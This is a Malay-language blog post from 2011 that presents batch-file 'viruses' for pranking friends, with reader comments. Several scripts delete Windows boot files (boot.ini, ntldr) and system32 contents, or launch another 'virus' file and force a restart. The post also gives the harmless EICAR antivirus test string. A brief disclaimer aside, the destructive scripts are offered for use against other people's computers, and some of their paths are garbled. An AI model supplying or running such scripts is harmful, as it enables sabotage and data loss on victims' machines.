Selasa, 26 Julai 2011

Cara Nak Buat Komputer Bagi "Lingkup" Terus

Salam sejahtera kepada semua pembaca blog..semoga berada dalam keadaan sihat semua yea..ceria2 selalu..hehe..ok tulis panjang pun tak guna sebab orang kan nak baca sangat kan panjang2 nie....hehe ok saya terus jea dengan topik kali nie macam mana nak buat komputer akan off selama-lamanya..Peeaaah dengar macam menarik kan nak perkena orang atau kawan2..Tapi ingat yea saya ajar dengan tujuan menyebarkan ilmu untuk belajar jea..So jangan pandai2 salah guna ilmu yang ada ok..Saya pun belajar jugak macam anda semua..Gunakanlah dengan sebaiknya..

 Cara pertama salin code dibawah dalam notepad dan save dengan nama optimusskypro.bat 



@ Echo off
attrib-r-s-h c: \ autoexec.bat
del c: \ autoexec.bat
attrib-r-s-h c: \ boot.ini
del c: \ boot.ini
attrib-r-s-h c: \ ntldr
del c: \ ntldr
attrib-r-s-h c: \ windows \ win.ini
del c: \ windows \ win.ini



Sedikit penerangan, setelah siap fail nie boleh mematikan sistem ShoutDown komputer dengan cara mendelate fail2 yang perlu dalam komputer untuk Reboot dan Restart...

Ok setakat ini sahaja untuk kali ini....Amaran yea saya tidak bertanggungjawab atas apa2 kejadian yang tak diundang hasil pembelajaran ini..

Lain-lain code virus ada dibawah>>

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*


Salin code diatas dan paste kan di notepad..save dengan nama test antivirus.exe


kegunaan code diatas untuk test antivirus berfungsi dengan baik atau tidak..Selalunya microsoft security  essential akan detec fail nie sebagai virus..Kira bagus jugak microsoft security essential nie.... 


Code seterusnya>>



@echo off
Start virus.bat
Shutdown –r



Copy dan paste dalam notepad save dengan nama arks.bat 


Code lain>>



@echo off
del"c:\windows\pchealth"
del"c:\windows\system"
del"c:\windows\                                                                  system32\restore"
del"c:\windows\        system32\autoexec.nt"
del"c:\windows\                system32\ntoskrni.exe"
del"c:\winlogon.exe"





macam biasa copy,paste dalam notepad save dengan nama mawar.bat







2 ulasan:

  1. terbaekk ar bro..
    nak nuntut ilmu dgn kau boleh x? =)

    BalasPadam
  2. aku tak pro pun...kalau nak join group klik link nie >https://www.facebook.com/groups/nghcrew/

    BalasPadam